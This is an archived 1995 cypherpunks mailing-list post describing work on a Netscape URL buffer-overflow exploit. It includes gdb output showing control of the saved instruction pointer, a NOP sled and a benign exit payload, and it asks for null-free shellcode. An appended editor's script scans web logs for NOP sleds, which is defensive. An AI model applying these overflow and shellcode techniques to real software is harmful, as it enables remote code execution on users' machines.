1995-09-27 - Status of Netscape Bug Exploit (suggestions needed)

Header Data

From: Ray Cromwell <rjc@clark.net>
To: cypherpunks@toad.com
Message Hash: df083b7c0a51deac933a672ee2db41ec0ec6c5f8eacd6f7cd4f8c96c0f04f483
Message ID: <199509270338.XAA09600@clark.net>
Reply To: N/A
UTC Datetime: 1995-09-27 03:38:18 UTC
Raw Date: Tue, 26 Sep 95 20:38:18 PDT

Raw message

From: Ray Cromwell <rjc@clark.net>
Date: Tue, 26 Sep 95 20:38:18 PDT
To: cypherpunks@toad.com
Subject: Status of Netscape Bug Exploit (suggestions needed)
Message-ID: <199509270338.XAA09600@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



Ok Folks, here's what I got so far...


1) a URL that can place a specific value in the program counter

(gdb) select-frame 2
(gdb) info frame
Stack level 2, frame at 0xefbfbc30:
 eip = 0xefbfbc30; saved eip 0x90909090
 ^^^^^^^^^^^^^^^^
 called by frame at 0x90909090, caller of frame at 0xefbfbc14
 Arglist at 0xefbfbc30, args: 
 Locals at 0xefbfbc30, Previous frame's sp is 0xefbfbc1c
 Saved registers:
  eax at 0xefbfbc2c, ecx at 0xefbfbc28, edx at 0xefbfbc24, ebx at 0xefbfbc20,
  ebp at 0xefbfbc18, esi at 0xefbfbc14, edi at 0xefbfbc10, eip at 0xefbfbc0c,
  ps at 0xefbfbc08
 
2) A piece of exploit code on the stack near the PC

(gdb) disassemble 0xefbfbc10 0xefbfbc40
0xefbfbc27:     nop    
0xefbfbc28:     nop    
0xefbfbc29:     nop    
0xefbfbc2a:     nop
0xefbfbc2b:     nop    
0xefbfbc2c:     nop    
0xefbfbc2d:     nop    
0xefbfbc2e:     nop    
0xefbfbc2f:     nop    
0xefbfbc30:     nop    
0xefbfbc31:     nop    
0xefbfbc32:     nop    
0xefbfbc33:     nop    
0xefbfbc34:     nop    
0xefbfbc35:     nop    
0xefbfbc36:     nop    
0xefbfbc37:     nop    
0xefbfbc38:     nop    
0xefbfbc39:     nop    
0xefbfbc3a:     nop    
0xefbfbc3b:     nop    
0xefbfbc3c:     nop    
0xefbfbc3d:     nop    
0xefbfbc3e:     nop    
0xefbfbc3f:     nop    
0xefbfbc40:     nop    
 
3) exploit code that calls the kernel syscall() with SYS_exit
  (benign exploit, causes your browser to exit)

The problem? To make a syscall under BSDI2.0, I have to execute
an lcall 0x7,0x0 with 1,0 on the stack. However, to exploit the netscape
bug, you cannot embed 0x0 in the URL. No problem I thought, I searched
Netscape's executable for any kernel calls, and found an lcall 0x7,0x0
at 0x257fee. But I can't do a 32-bit direct jump without a zero
in the instruction (the 32-bit address is 0x00257fee), and I can't
do a relative jump from 0xefbfbc30+ 

If you can come up with some 386 assembly under BSDI2.0 which can
invoke syscall() in the kernel without any embedded 0x0 bytes
in the code, you can share a Hack Netscape T-Shirt with me.

If it turns out to be too hard under BSDI, I'll gladly assist
in producing exploits for Windows or another operating system.

One trick I thought up for embedding zeros in the code is to self-modify
the code using XOR ADDRESS,ADDRESS where ADDRESS is a byte on the stack
within the code.

Anyone have any better ones?

-Ray
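Editor's note: the message above shows the two things a server operator could actually watch for in 1995-era web logs: an overlong URL and a run of 0x90 (NOP) bytes padding the path to the overwritten return address. The script below is an added example, not part of Ray's message or of any Netscape code; it decodes the URL from constructed Common Log Format lines and flags requests carrying a NOP sled. The log format, client addresses and the 16-byte threshold are assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines (Common Log Format, not taken from the message).
SLED = "%90" * 32  # 32 percent-encoded NOP (0x90) bytes, the sled pattern seen in the gdb dump
SAMPLE_LOG = (
    '10.0.0.5 - - [26/Sep/1995:20:38:18 -0700] "GET /index.html HTTP/1.0" 200 1043\n'
    f'10.0.0.9 - - [26/Sep/1995:20:39:02 -0700] "GET /cgi-bin/search?q={SLED}AAAA HTTP/1.0" 404 0\n'
    '10.0.0.7 - - [26/Sep/1995:20:40:11 -0700] "GET /docs/%90%90faq.html HTTP/1.0" 200 512\n'
)

# Pull method and URL out of the quoted request field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"')


def longest_nop_run(data: bytes, nop: int = 0x90) -> int:
    """Length of the longest run of consecutive NOP bytes in data."""
    best = run = 0
    for b in data:
        run = run + 1 if b == nop else 0
        best = max(best, run)
    return best


def scan_log(text: str, min_run: int = 16) -> list:
    """Return (line_no, client, run_length) for every request whose
    percent-decoded URL contains a NOP run of at least min_run bytes.
    Decoding first matters: the sled arrives as %90%90..., never as raw bytes."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # malformed or non-request line, skip it
        decoded = unquote_to_bytes(m.group("url"))
        run = longest_nop_run(decoded)
        if run >= min_run:
            hits.append((n, line.split()[0], run))
    return hits


if __name__ == "__main__":
    for lineno, client, run in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {client} sent a URL containing a {run}-byte NOP sled")
```

A legitimate path can contain a stray %90 or two (line 3 above), so the threshold, not the mere presence of the byte, is what separates noise from a sled.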